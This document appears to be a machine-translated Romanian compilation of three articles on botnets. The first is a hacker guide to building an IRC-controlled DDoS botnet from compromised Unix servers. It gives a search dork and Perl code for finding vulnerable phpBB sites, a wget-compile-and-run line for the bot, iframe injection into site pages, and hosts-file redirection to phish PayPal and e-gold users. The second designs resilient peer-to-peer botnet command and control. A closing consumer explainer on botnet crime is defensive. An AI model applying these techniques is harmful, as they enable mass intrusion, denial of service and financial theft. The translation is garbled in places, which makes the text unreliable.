Ne creăm propriul botnet de luptă. Care ar trebui să fie rețelele botnet ideale

Sistemele de protecție sunt îmbunătățite constant, programatorii devin mai experimentați. Din ce în ce mai puține greșeli cunoscute sunt acum făcute.

[prolog]
Internetul crește cu mare forță. Devine din ce în ce mai greu pentru un hacker să găsească vulnerabilități. Administratorii folosesc cei mai tari experți în securitate pentru a proteja dezvoltarea. Îți recunoști gândurile? De fapt, Internetul este plin de vulnerabilități, dar acestea sunt de puțin folos. Ei bine, încă mai este cum să arăți. Aici, imaginează-ți situația, te-a prins un nenorocit de rețea, vrei să-l pedepsești. Astăzi vom vorbi despre crearea propriei botnet de luptă.
Deci, ce este un „bot”? O persoană neinițiată își amintește imediat de adversarii proști din jocurile pe calculator, pe care îi împuști în două minute. Da, acest lucru este parțial adevărat. În cazul nostru, „bot” este un program care execută comenzile încorporate în el. Ca nimic special. Cineva va obiecta: „Eu, se spune, am scris asta la cinci ani, apeși butonul și programul, olya-la, se închide” Să uităm de copilărie. Știm cu toții că posibilitățile de codare sunt nesfârșite și poate fi folosită pentru bine și pentru rău. Desigur, ne folosim întotdeauna evoluțiile cu bune intenții. „Botnet” este un set de roboți adunați într-un singur centru, care execută sincron comenzile proprietarului. Apropo, boții se adresează în principal mașinilor Windows. Aici puteți fura parole, instala șosete și formata șurubul. Mă voi abate de la reguli și vă spun cum să creați un botnet de la mașinile nix. Funcția principală a botului nostru este organizarea atacurilor DDOS. Acesta este modul ideal de a folosi canalele largi ale serverelor nix. Să calculăm. Serverul care trebuie „umplut” este pe un canal de 100 Mb. Adică, 10-20 de roboți care stau pe același canal vor copleși serverul într-o clipă. Dacă vă puteți ascunde în spatele unui firewall de pe un server, atunci, din păcate, nu există salvare de la un număr mai mare de roboți

[Scriind un bot]
Puteți găsi o listă cu un exemplu de bot la linkul de la sfârșitul articolului. Să aruncăm o privire la cod. (uh, Dream este controlat din nou prin IRC? WEB este mai bine!). De altfel, controlul prin IRC a fost ales pentru interactivitate. Să presupunem că vreau să folosesc exploit-uri nucleare locale pe câteva servere dintr-o rețea bot. Pur și simplu voi executa comanda SH uname -a folosind botul și voi găsi instantaneu computerul de care am nevoie. Apoi, după ce am executat și comanda în clientul IRC, voi descărca backdoor și voi obține un shell interactiv pentru acțiuni ulterioare. Posibilitățile sunt nesfârșite. Veți spune că un astfel de control poate fi implementat și prin WEB, dar de ce să reîncărcați pagina și să risipiți trafic? Este mult mai convenabil să observi totul în timp real (deși, cu o rețea botnet de peste 1000 de boți, poți avea grijă de comoditatea interfeței - notă de bun simț). Mulți oameni cred că organizarea DDOS este o chestiune foarte complicată. Iată un exemplu de cod pentru un atac normal:

GET /server.org HTTP/1.0\r\nConexiune: Keep-Alive\r\nAgent utilizator: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nGazdă: server.org:80\r\nAccept: imagine/gif, imagine/x-xbitmap, imagine/jpeg, imagine/pjpeg, imagine/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso- 8859-1,*,utf-8\r\n\r\n

Adică pur și simplu trimitem o cerere către server, forțând un răspuns la aceasta. Mai mult, îl trimitem până când serverul se defectează din cauza lipsei de trafic sau a timpului procesorului. Dar dacă nu sunteți limitat la un robot nix, trebuie să creați o rețea botnet Windows, de exemplu, bazată pe AgoBot. Pentru a face acest lucru, puteți crea un cod pentru bot care va scana pentru vulnerabilități ale mașinii lsasl / dcom care se conectează la serverul pe care este instalat botul.

[Creează o rețea bot]
De fapt, crearea unei rețele bot este foarte ușoară. Pentru a face acest lucru, trebuie să găsim o vulnerabilitate în orice script web. Vulnerabilitatea găsită ar trebui să permită executarea comenzilor interpretului shell. Când găsiți o vulnerabilitate, acordați atenție numelui fișierului important, titlului acestuia, numelui sistemului vulnerabil. Acum, cu ajutorul acestor date, trebuie să faceți o interogare de căutare bună. De exemplu, luați o vulnerabilitate binecunoscută în phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") sau următorul; print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu=<$sock>; close($sock);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Aici puteți vedea două probleme deodată. wget și gcc pot să nu fie prezente sau utilizarea lor va fi interzisă. Aici fech, curl and get downloads sau browserul consolei lynx ne va ajuta sau folosi protocolul ftp. Implementarea sa este mai complicată, dar avantajul este că ftp este peste tot. În ceea ce privește compilatorul, puteți pur și simplu să compilați binarul pe shell și să sperați că totul va fi în regulă cu compatibilitate sau să rescrieți botul în limbaje interpretate - Perl sau PHP. Fiecare metodă are avantajele și dezavantajele ei, pe care să o folosești, alegerea este a ta. Sunt obișnuit să folosesc serverul capturat la maximum. La urma urmei, un bot pe un server nix va dura doar până la prima repornire a mașinii. Există o cale interesantă de ieșire din această situație. Botul va căuta fișiere care pot fi citite (.pl, .php) disponibile pentru scriere și le va adăuga codul de descărcare și lansare al botului. Sau puteți crea o altă rețea botnet șurub. De asemenea, este ușor de implementat. Aici avem nevoie de o vulnerabilitate în browserul de internet (Internet Explorer, Opera, Mozilla) care duce la descărcarea și lansarea fișierului dorit. În continuare, este creată o înregistrare inframe care încarcă codul nostru rău intenționat. Această intrare este adăugată la toate fișierele index (sau la tot ce există cod html, totul depinde de obrăznicia ta). Un mic script Haz, pe care îl veți găsi și în arhivare, face o treabă excelentă cu această lucrare. Bugtrack-ul este plin de înregistrări ale vulnerabilităților critice în Internet Explorer, așa că vom avea și o rețea botnet pe sistemele Windows sub controlul nostru (am menționat avantajele acesteia mai sus). Asta e tot, rulează viermele nostru de căutare pe o coajă de mare viteză, bea cafea (bere, vodcă, suc de roșii), mergi la canalul IRC specificat în proprietățile botului și urmărește numărul subordonaților tăi. In concluzie, vreau sa salut tuturor celor care ma cunosc si va doresc mult succes. Nu fi prins.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Vulnerabilitatea în phpBB este relevantă până la versiunea 2.0.16, deși dezvoltatorii susțin că au remediat-o în 2.0.11

http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

phishing
Este foarte convenabil să folosiți roboții ca organizație de phishing. Pentru a face acest lucru, avem nevoie de pagini speciale sharpened pentru phishing care să emuleze site-ul de care avem nevoie și o găzduire bună, un server dedicat sau VDS. Astfel de pagini pot fi făcute chiar dvs., cumpărate, găsite pe net. Alegerea este uriașă. Cel mai adesea, phishingul este organizat pe site-uri: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.com și altele, într-un fel sau altul legate de comerțul electronic. Apoi, botul Windows rescrie fișierul \system32\drivers\etc\hosts adăugând adresa IP a serverului dvs. și atribuind un alias site-ului de care aveți nevoie. Formatul fișierului este:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Adică, tastând site-urile e-gold.com și paypal.com în browser, utilizatorul ajunge la serverul nostru fără a bănui nimic. La rândul său, pe serverul phisher-ului, în httpd.conf sunt adăugate intrări despre domeniile corespunzătoare.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​​​"e-gold.com" "www.e-gold.com"

Desigur, în linia browserului va exista o adresă familiară e-gold.com și chiar și un utilizator avansat se va autentifica pe site fără a bănui nimic. Pentru a completa imaginea, voi spune că dacă utilizatorul folosește un server proxy, atunci această metodă nu va funcționa

Boti pentru toate gusturile
Agobot/Phatbot/Forbot/XtremBot
Aceasta este cea mai bună familie de roboți. Scris în C++. Au multe caracteristici anti-detecție și mai mult de 500 de modificări datorită unei structuri modulare clar definite.
SDBot/RBot/UrBot/UrXBot
Boti foarte populari în acest moment pentru efectuarea de atacuri DDOS. Au multe caracteristici suplimentare. Cum ar fi deschiderea Sock4, keylogger, scanner automat lsass și vulnerabilități dcom. De asemenea, are funcția de a redirecționa cererile către site-urile companiilor antivirus către serverul local prin editarea \system32\drivers\etc\hosts și instalarea unui mic server web fals pe portul 80.
Boti DSNX
Acest bot poate efectua atacuri DDOS, scanări de porturi și alte lucruri mici.
Q8 Bots
Bot grozav pentru sistemele nix. Se distinge prin codul compact (27 Kb, format dintr-un singur fișier) și funcționalitate bună. Capabil să se actualizeze dinamic prin descărcarea și rularea unui fișier nou. Ei bine implementează principalele implementări ale DDOS (SYN-flood, UDP-flood). Capabil să execute comenzi de sistem. De asemenea, se camuflează bine în sistem.
kaiten
De asemenea, un bot bun pentru sistemele Unix/Linux. Capabil să deschidă un shell la distanță pe un server capturat.
Boți bazați pe Perl
Acestea sunt roboți foarte mici, scrise în Perl. Folosit pentru atacuri DDOS asupra sistemelor bazate pe Unix.

---
Articolul are o părtinire mare față de hacking, așa că nu este clar - întrebați.

Nu e de mirare că am publicat o schiță a notei mele despre rețelele peer-to-peer. Comentariile cititorilor au fost de mare ajutor. Ei au fost cei care m-au inspirat să lucrez în continuare în această direcție. Ce a rezultat - uită-te sub tăietură.

După cum puteți vedea din titlul postării, astăzi vom vorbi doar despre botnet-uri. Să uităm pentru o perioadă de partajarea fișierelor, rețelele proxy, blogurile peer-to-peer și moneda p2p.

Cuvântul „botnet” nu trebuie înțeles ca ceva ilegal. Când un utilizator descarcă și instalează în mod voluntar un „bot” pentru a-și dona traficul și resursele de calcul unui proiect științific, acesta este și o rețea bot. În consecință, un botmaster nu este neapărat un criminal. Un grup de 30 de oameni de știință care lucrează la un proiect științific este, de asemenea, „botmaster”.

1. Control botnet prin server

Cel mai simplu mod de a gestiona roboții este să rulați un server irc/http. Prin intermediul acestuia, boții vor primi comenzi și cu ajutorul ei vor trimite rezultatul execuției lor.

Desenez cat pot de bine :) In acest caz, s-ar putea sa nu fie nevoie de o ilustrare, dar am decis sa va pregatesc pentru socul pe care il vor produce restul desenelor.

  • O implementare foarte simplă, mai ales în cazul IRC.
  • Răspuns rapid la bot.
  • Puteți emite comenzi atât către întreaga rețea, cât și către un anumit bot.
  • Dacă rețeaua constă din sute de noduri, un canal în DalNet este suficient pentru a o gestiona. Pentru rețele mai mari, puteți cumpăra o găzduire web ieftină (aproximativ 300 de ruble / lună).
  • În cazul HTTP-serverul simplifică foarte mult dezvoltarea unei interfețe frumoase. Acest lucru este important dacă folosim o rețea bot într-un serviciu web.
  • Încărcarea serverului. Numărul de noduri din cele mai mari botnet-uri este măsurat în milioane. Pentru a gestiona o astfel de mulțime, un server nu este suficient.
  • Dacă se întâmplă ceva cu serverul (defecțiune de rețea, DDoS, incendiu în centrul de date), rețeaua se va termina.
  • Un server este ușor de firewall. Acest lucru poate fi făcut atât de furnizor, cât și de produsele Kaspersky Lab pe computerul utilizatorului.
  • Un botmaster este relativ ușor de găsit. Odată ce am uitat de VPN - așteptați oaspeții în uniformă.
  • În cazul IRC, comenzile sunt primite numai de roboții online. Dacă botul intră pe canal la două minute după trimiterea comenzii, va fi „off topic”.
  • Numărul de boți și IP-ul lor pot fi determinate accesând canalul IRC. Protejarea canalului cu o parolă nu va ajuta, deoarece aceasta din urmă este ușor de ales din codul bot.

2. Control prin rețeaua IRC

Un pas logic pentru a face față dezavantajelor metodei anterioare este să faci nu un server, ci mai multe. După părerea mea, cel mai simplu mod de a face acest lucru este să vă ridicați propria rețea IRC. În acest caz, întreaga responsabilitate pentru transferul de date între servere revine protocolului IRC. Din partea botului, nu va exista nicio diferență față de soluția anterioară.

  • Implementare simplă, deși va trebui să te chinui cu configurarea serverelor.
  • Boții încă răspund rapid la comenzi.
  • Este încă posibil să emiti comenzi unui anumit bot.
  • Echilibrare de încărcare între servere, protecție împotriva DDoS și forță majoră. O duzină de servere bune pot fi suficiente pentru o rețea de un milion de roboți.
  • Dacă unele dintre servere eșuează, puteți avea timp să le înlocuiți.
  • Dacă utilizați IRCși încurcă o mie de roboți care stau pe un canal, folosesc mai multe canale. În consecință, puteți da diferitelor părți ale rețelei sarcini diferite.
  • Va trebui să plătiți pentru servere / VDS.
  • Puteți firewall toate serverele în același timp, iar botmasterul nu va avea timp să le înlocuiască.
  • Botmaster-ul este încă destul de ușor de urmărit.
  • În cazul IRC, numărul de roboți și IP-urile lor sunt încă la vedere.
  • Boții care tocmai s-au alăturat canalului sunt în afara subiectului.

Termenul trastring (inel de încredere, cerc / inel de încredere) l-am auzit prima dată de la tovarășul Nickolas în comentariile postării anterioare. Vorbim despre încredințarea funcției de „servere” unei părți a rețelei bot.

  • Nu sunt necesare servere.
  • Un trastring poate consta din sute de noduri. Creșterea și controlul atât de multe servere irc/http nu este ușor.
  • Boții nu ar trebui să păstreze întotdeauna o conexiune la trastring. Este suficient să verificați la fiecare 5-10 minute dacă există comenzi noi. Fiecare comandă trebuie să aibă un TTL pentru care este stocată în trastring.
  • Un număr mare de „servere” asigură rezistența rețelei la tot felul de dezastre. Când o parte a inelului moare, botmaster-ul poate da comanda de a crea un nou trastring. Sau nodurile inelului o pot face singure (au nevoie de semnături digitale și acordul unui anumit procent de trastring).
  • Lăsați trastring-ul să fie format din 512 noduri, cel puțin 50% sunt în mod constant online. Dacă există 1.000.000 de boți în rețea și fiecare dintre ei este în mod constant online, vor exista mai puțin de 4.000 de boți pe nod de trastring. Când botul solicită comenzi (sau trimite un rezultat) o dată la 10 minute, fiecare nod de inel va procesa simultan o medie de 7 conexiuni. Destul de puțin pentru o rețea de această dimensiune, nu?
  • O listă exactă a tuturor roboților poate fi obținută numai de către botmaster.
  • Puteți emite comenzi unui anumit bot sau unui anumit grup de roboți.
  • Reacția rapidă a roboților la comenzi.
  • Botmaster este greu de găsit.

Singurul negativ pe care îl văd este complexitatea implementării.

4. Rețele peer-to-peer

Potrivit surselor de pe Internet, botnet-urile P2P sunt în prezent foarte populare. Dintre aceste surse, cea mai mare atenție merită. Fiecare nod dintr-o astfel de rețea cunoaște doar câteva noduri „învecinate”. Botmasterul trimite comenzi către mai multe noduri de rețea, după care este transmis de la vecin la vecin.

Lista vecinilor este dată boților o dată pe un server special. Poate fi, de exemplu, un site piratat. Serverul nu face altceva, este necesar doar atunci când adăugați noduri la botnet.

  • Implementarea este ceva mai simplă decât în ​​paragraful anterior.
  • Sarcină minimă pe toate nodurile de rețea. Dimensiunea unei rețele bot este practic nelimitată.
  • Rezistent la DDoS, opriri de noduri etc. Firewall-ul unui botnet p2p este aproape imposibil.
  • Fără conexiuni persistente, așa cum este cazul IRC.
  • Avem nevoie de un server, deși nu pentru mult timp.
  • Nodurile mor din când în când, ceea ce afectează conectivitatea rețelei.
  • Pentru a obține o listă cu toți roboții, de exemplu, trebuie să le instruiți să acceseze un anumit site. În acest caz, nu există nicio garanție că numai botmasterul va primi lista.
  • Pentru a da o comandă unui anumit nod, trebuie fie să o trimiteți către întreaga rețea, fie să vă conectați direct la nod.
  • Răspuns lent al roboților la comenzi.
  • Pentru a trimite o comandă „lungă”, de exemplu, cu o listă de adrese URL, trebuie să utilizați un server terță parte, altfel reacția boților va încetini și mai mult.
  • Este mai ușor să găsești un botmaster decât în ​​exemplul anterior, datorită utilizării unui fel de server.

Desigur, aș putea greși, dar, în opinia mea, botnet-urile p2p sunt mult mai rele decât trastring. Poate că producătorii de antivirusuri tac despre ceva?

5. Soluție completă

O modalitate de a inventa ceva nou și bun este să traversezi ceva vechi. Am combinat un telefon, un computer, un magnetofon, o cameră și o cameră video - am primit un smartphone. Nu vei surprinde pe nimeni cu un computer și climatizare într-o mașină. Lipiți un magnet de frigider pe fiecare iaurt și vânzările vor crește vertiginos.

Este important să ne amintim că, în cazul unei traversări nereușite, putem obține un individ bun la nimic. Sună ca niște algoritmi genetici, nu? Să luăm o idee aparent bună - un botnet p2p, unde trastring este responsabil pentru alocarea vecinilor. Atunci nu avem nevoie de niciun server!

Dar în acest caz, complexitatea implementării va crește, deși nu cu mult. Problemele rămase ale rețelei botne p2p vor rămâne nerezolvate. Victoria este nesemnificativă, scorul este 1:1.

Dupa ce am stat putin cu o bucata de hartie si un creion, am dat nastere la urmatoarea idee. Din câte știu, nu a mai fost niciodată exprimat și eu sunt primul care a venit cu asta. HR plus 100.

Ce se întâmplă dacă rețeaua va avea două stări - „activ” și „pasiv”. Într-o stare pasivă, botnetul funcționează conform schemei p2p. Botmasterul trimite comanda „mobilizați trupele” și rețeaua se transformă într-un trastring. În comanda sa, botmaster-ul trebuie să specifice nodurile de urmărire și timpul pentru care rețeaua își schimbă starea. Pentru a mări inelul, puteți instrui mai mulți roboți să-și numească vecinii. În plus, toate comenzile sunt transmise prin trastring. El este, de asemenea, responsabil pentru alocarea de „vecini” nodurilor noi. Dacă TTL-ul inelului se dovedește ulterior a fi insuficient, poate fi dată o comandă de „prelungire a stării active”.

Un astfel de botnet nu va moșteni niciunul dintre dezavantajele unei rețele p2p și va avea toate avantajele trastringului, precum și următoarele:

  • Rezistență crescută la atacurile ddos ​​și filtrele de rețea, cum ar fi o rețea p2p.
  • Consumul minim de resurse de către roboți în timpul opririi rețelei. Botmasterul nu trebuie să urmărească starea trastring-ului și să selecteze noi noduri pentru acesta.
  • La crearea unui traser, sunt selectate numai acele noduri care sunt în prezent online. Boții se vor conecta la inel la prima încercare (pentru o perioadă).
  • Lista de „vecini” este actualizată periodic. Cu toate acestea, IP-ul nodurilor incluse în inelul temporar este cunoscut întregii botnet. Deci, lăsați-i să considere aceste noduri drept vecini dacă unii dintre vecinii adevărați nu au apărut în rețea de mult timp.

Și singurul dezavantaj pe care îl văd aici este complexitatea implementării. Dar aceasta nu este cu adevărat o problemă.

6. Ce este important de reținut

Până acum, am tăcut în legătură cu unele puncte, deoarece acestea sunt inerente oricăreia dintre metodele numite de control al unei rețele bot. Ar trebui să te concentrezi asupra lor.

  • Unele noduri nu pot accepta conexiuni de intrare din cauza unui firewall sau a unui NAT. Cel puțin, acest lucru ar trebui să fie luat în considerare atunci când scrieți un bot. De exemplu, atunci când distribuie comenzi într-o rețea p2p, bot-ul trebuie să contacteze periodic vecinii săi și să nu aștepte comenzi de la aceștia.
  • Trebuie să presupunem că toate comenzile trimise în rețea sunt ascultate. Cel puțin, o persoană interesată poate modifica codul bot în aceste scopuri. Cu toate acestea, este logic să criptați tot traficul transmis în rețea. Cel puțin, acest lucru va complica analiza rețelei bot.
  • Toate comenzile botmaster trebuie să fie semnate digital. Parolele nu sunt bune pentru că pot fi interceptate.
  • Întrucât vorbim de implementare, observ că orice botnet trebuie să aibă cel puțin trei comenzi - actualizarea boților, actualizarea cheii botmaster și autodistrugerea întregii rețele.
  • Există noduri „spion” în rețea. Unele dintre ele sunt incluse în trastring. În același timp, nu cunoaștem obiectivele pe care acești „spioni” le urmăresc - aceasta poate fi determinarea IP-ului botmasterului, întreruperea execuției comenzilor, dezactivarea rețelei, obținerea controlului asupra rețelei bot și așa mai departe. În special, aceasta înseamnă că roboții ar trebui să aleagă un nod aleatoriu atunci când se conectează la inel, în loc să-l folosească pe același nod tot timpul.
  • În figură, nodurile de urmărire sunt conectate între ele, dar este mult mai practic să implementați inelul sub forma unei rețele p2p mici, adică conform principiului „vecini”.

De asemenea, observ că soluțiile 1 și 2 (server, multe servere) pierd multe dintre minusuri și obțin câteva plusuri de la soluția 3 (trastring) atunci când se utilizează protocolul HTTP. Derulați din nou aceste paragrafe pentru a înțelege ce vreau să spun.

7. Concluzii

Pentru rețelele mai mici, o soluție bună este utilizarea IRC. De exemplu, dacă doriți să vă creați propria rețea mică pentru calcul distribuit, instalați un bot pe computerul dvs. de acasă, laptop, netbook, computerul de la serviciu (dacă politica companiei o permite) și gestionați rețeaua prin DalNet. Dacă este necesar, mai târziu rețeaua poate fi „pompată” la trastring. Veți oferi comanda corespunzătoare, nu?

Dacă o rețea botnet are nevoie de o interfață web frumoasă, ar putea avea sens să scrieți un program suplimentar care să preia comenzi de la serverul web și să le trimită la IRC. Cel puțin luați în considerare această abordare.

Soluțiile universale sunt trastring și p2p+trastring. Astfel de rețele vor funcționa în mod ideal indiferent de câte noduri au, 1 sau 1.000.000, fără servere.

Din cauza dezavantajelor evidente ale „p2p pur” în comparație cu inelul, îmi rămâne neclar de ce este considerat o soluție bună. Cu siguranță roboții care alcătuiesc rețeaua au multe caracteristici utile. De ce să nu adăugați încă o sarcină utilă mică - mobilizarea rețelei la trastring?

Asta, poate, este tot. Mă voi bucura de oricare dintre comentariile dumneavoastră. Mai ales cu critici, subliniind inexactitățile / inconsecvențele din text și ideile tale despre subiectul abordat.

Astăzi, botnet-urile au devenit unul dintre principalele instrumente ale infractorilor cibernetici. ComputerBild vă va spune ce sunt rețelele bot, cum funcționează și cum să vă salvați computerul de la intrarea într-o rețea zombie.

O rețea botnet, sau rețea zombi, este o rețea de computere infectate cu programe malware care le permite atacatorilor să controleze de la distanță mașinile altor persoane fără știrea proprietarilor lor. În ultimii ani, rețelele de zombi au devenit o sursă stabilă de venit pentru infractorii cibernetici. Costurile scăzute în mod constant și cunoștințele minime necesare pentru gestionarea rețelelor bot contribuie la creșterea popularității și, prin urmare, a numărului de rețele bot. Atacurile DDoS sau trimiterile de spam efectuate folosind rețele zombie, atacatorii și clienții lor câștigă mii de dolari.

Este computerul meu infectat cu un bot?

Nu este ușor să răspunzi la această întrebare. Faptul este că este aproape imposibil să urmăriți intervenția roboților în funcționarea zilnică a unui computer, deoarece nu afectează în niciun fel performanța sistemului. Cu toate acestea, există mai multe semne prin care puteți determina că un bot este prezent în sistem:

Programele necunoscute încearcă să se conecteze la Internet, ceea ce este raportat periodic indignat de firewall-ul sau software-ul antivirus;

Traficul pe internet devine foarte mare, deși folosești Web-ul foarte moderat;

Cele noi apar în lista proceselor de sistem care rulează, mascarându-se drept procese Windows obișnuite (de exemplu, botul poate fi numit scvhost.exe - acest nume este foarte asemănător cu numele procesului de sistem Windows svchost.exe; este destul de dificil să sesizeze diferența, dar este posibil).

De ce sunt create botnet-urile?

Rețelele bot sunt create pentru a face bani. Există mai multe domenii de utilizare profitabilă din punct de vedere comercial a rețelelor de zombi: atacuri DDoS, colectare de informații confidențiale, spam, phishing, spam în motoarele de căutare, contoare de clicuri înșelate etc. Trebuie remarcat că orice direcție va fi profitabilă, indiferent de atacatorul ales. , și A botnet permite ca toate aceste activități să fie efectuate simultan.

Un atac DDoS (din limba engleză Distributed Denial-of-Service) este un atac asupra unui sistem informatic, cum ar fi un site web, al cărui scop este de a aduce sistemul într-o „cădere”, adică o stare în care poate nu mai primesc și procesează solicitări utilizatori legitimi. Una dintre cele mai comune metode de a desfășura un atac DDoS este trimiterea de cereri multiple către computerul sau site-ul victimă, ceea ce duce la refuzul serviciului dacă resursele computerului atacat sunt insuficiente pentru a procesa toate solicitările primite. Atacurile DDoS sunt o armă formidabilă pentru hackeri, iar un botnet este instrumentul perfect pentru a le duce la îndeplinire.

Atacurile DDoS pot fi atât un mijloc de concurență neloială, cât și acte de terorism cibernetic. Proprietarul unui botnet poate oferi un serviciu oricărui antreprenor care nu este prea scrupulos - să efectueze un atac DDoS pe site-ul concurentului său. Resursa atacată va „cădea” după o astfel de încărcare, clientul atacului va primi un avantaj temporar, iar criminalul cibernetic va primi o recompensă modestă (sau nu atât).

În același mod, proprietarii de botnet pot folosi atacurile DDoS pentru a stoarce bani de la companiile mari. În același timp, companiile preferă să respecte cerințele infractorilor cibernetici, deoarece eliminarea consecințelor atacurilor DDoS de succes este foarte costisitoare. De exemplu, în ianuarie 2009, GoDaddy.com, una dintre cele mai mari gazde, a fost supus unui atac DDoS, în urma căruia mii de site-uri găzduite pe serverele sale au fost indisponibile aproape o zi. Pierderile financiare ale gazdei au fost uriașe.

În februarie 2007, au fost efectuate o serie de atacuri pe serverele DNS rădăcină, a căror funcționare afectează direct funcționarea normală a întregului Internet. Este puțin probabil ca scopul acestor atacuri să fi fost prăbușirea World Wide Web, deoarece existența rețelelor de zombi este posibilă doar dacă Internetul există și funcționează normal. Mai presus de toate, a fost ca o demonstrație a puterii și capacităților rețelelor de zombi.

Publicitatea serviciilor pentru implementarea atacurilor DDoS este postată în mod deschis pe multe forumuri pe subiectele relevante. Prețurile pentru atacuri variază de la 50 la câteva mii de dolari pe zi de funcționare continuă a unui botnet DDoS. Potrivit site-ului www.shadowserver.org, în 2008 au avut loc aproximativ 190.000 de atacuri DDoS, din care infractorii cibernetici au reușit să câștige aproximativ 20 de milioane de dolari. Desigur, această sumă nu include veniturile din șantaj, care este pur și simplu imposibil de calculat.

Colectarea de informații confidențiale

Informațiile confidențiale care sunt stocate pe computerele utilizatorilor vor atrage întotdeauna intrusi. De cel mai mare interes sunt numerele cărților de credit, informațiile financiare și parolele pentru diferite servicii: cutii poștale, servere FTP, mesagerie instantanee etc. În același timp, malware-ul modern permite atacatorilor să aleagă exact datele de care sunt interesați - trebuie doar să le încărcați la modulul corespunzător PC.

Atacatorii pot fie să vândă informațiile furate, fie să le folosească în avantajul lor. Sute de reclame pentru vânzarea de conturi bancare apar în fiecare zi pe numeroase forumuri de pe Web. Costul unui cont depinde de suma de bani din contul utilizatorului și variază de la 1 USD la 1.500 USD per cont. Limita inferioară indică faptul că, în cursul concurenței, infractorii cibernetici implicați în acest tip de afaceri sunt obligați să reducă prețurile. Pentru a câștiga cu adevărat mulți bani, au nevoie de un aflux constant de date proaspete, iar acest lucru necesită o creștere constantă a rețelelor de zombi. Carderii sunt interesați în special de informațiile financiare - intrușii implicați în contrafacerea cardurilor bancare.

Cât de profitabile pot fi judecate astfel de operațiuni după binecunoscuta poveste a unui grup de criminali cibernetici brazilieni care au fost arestați în urmă cu doi ani. Ei au putut să retragă 4,74 milioane de dolari din conturile bancare ale utilizatorilor obișnuiți folosind informații furate de pe computere. Infractorii care sunt angajați în falsificarea de documente, deschiderea de conturi bancare false, efectuarea de tranzacții ilegale etc. sunt interesați și de achiziționarea de date personale care nu au legătură directă cu banii utilizatorului.

Un alt tip de informații colectate de botnet-urile sunt adresele de e-mail și, spre deosebire de numerele cardurilor de credit și numerele de cont, multe adrese de e-mail pot fi extrase din agenda de adrese a unui singur computer infectat. Adresele colectate sunt scoase la vânzare, iar uneori „la greutate” – pe megaoctet. Principalii cumpărători ai unui astfel de „produs” sunt spammerii. O listă cu un milion de adrese de e-mail costă de la 20 la 100 de dolari, iar trimiterea comandată către spammeri la același milion de adrese costă 150-200 de dolari. Beneficiul este evident.

Infractorii sunt interesați și de conturile diferitelor servicii plătite și magazine online. Ele sunt cu siguranță mai ieftine decât conturile bancare, dar implementarea lor este asociată cu un risc mai scăzut de hărțuire de către forțele de ordine.

Milioane de mesaje spam circulă în întreaga lume în fiecare zi. Trimiterea de e-mailuri nesolicitate este una dintre funcțiile principale ale botnet-urilor moderne. Potrivit Kaspersky Lab, aproximativ 80% din spam-ul este trimis prin rețele zombie. De pe computerele utilizatorilor care respectă legea, sunt trimise miliarde de scrisori cu reclame pentru Viagra, copii ale ceasurilor scumpe, cazinouri online etc., înfundând canalele de comunicare și cutiile poștale. În acest fel, hackerii pun în pericol computerele utilizatorilor nevinovați: adresele de la care sunt trimise e-mailurile sunt trecute pe lista neagră de companiile antivirus.

În ultimii ani, sfera serviciilor de spam s-a extins: a apărut spam ICQ, spam în rețelele sociale, forumuri și bloguri. Și acesta este și „meritul” proprietarilor de botnet: la urma urmei, nu este dificil să adăugați un modul suplimentar la clientul bot care deschide orizonturi pentru o nouă afacere cu sloganuri precum „Spam pe Facebook. Ieftin." Prețurile pentru spam variază în funcție de publicul țintă și de numărul de adrese către care sunt trimise. Gama de prețuri pentru corespondența vizată este de la 70 USD pentru sute de mii de adrese până la 1.000 USD pentru câteva zeci de milioane de adrese. În ultimul an, spammerii au câștigat aproximativ 780 de milioane de dolari prin trimiterea de e-mailuri.

Generați spam de căutare

O altă opțiune pentru utilizarea botnet-urilor este creșterea popularității site-urilor în motoarele de căutare. Atunci când lucrează la optimizarea motoarelor de căutare, administratorii de resurse încearcă să mărească poziția site-ului în rezultatele căutării, deoarece cu cât aceasta este mai mare, cu atât mai mulți vizitatori vor veni pe site prin intermediul motoarelor de căutare și, prin urmare, cu atât va avea mai multe venituri proprietarul site-ului. primesc, de exemplu, din vânzarea de spațiu publicitar pe paginile web. Multe companii plătesc webmasteri mulți bani pentru a aduce site-ul pe prima poziție în „motoarele de căutare”. Proprietarii de botnet au spionat unele dintre trucurile lor și au automatizat procesul de optimizare a motoarelor de căutare.

Când vezi în comentariile la intrarea ta în LiveJournal sau o fotografie de succes postată pe o găzduire foto, o mulțime de link-uri create de o persoană necunoscută pentru tine și, uneori, de „prietenul tău” - nu fi surprins: cineva tocmai a comandat promovarea resursei lor către botnetul proprietarilor. Un program special creat este încărcat pe un computer zombi și, în numele proprietarului său, lasă comentarii asupra resurselor populare cu link-uri către site-ul promovat. Prețul mediu pentru serviciile de căutare ilegale de spam este de aproximativ 300 USD pe lună.

Cât costă datele personale

Costul datelor cu caracter personal furate depinde direct de țara în care locuiește proprietarul lor de drept. De exemplu, datele complete ale unui rezident din SUA costă 5-8 USD. Pe piața neagră, datele de la rezidenții Uniunii Europene sunt deosebit de apreciate - sunt de două până la trei ori mai scumpe decât datele de la cetățenii Statelor Unite și Canadei. Acest lucru poate fi explicat prin faptul că infractorii pot folosi astfel de date în orice țară care face parte din UE. În medie, prețul unui pachet complet de date despre o persoană din întreaga lume este de aproximativ 7 USD.

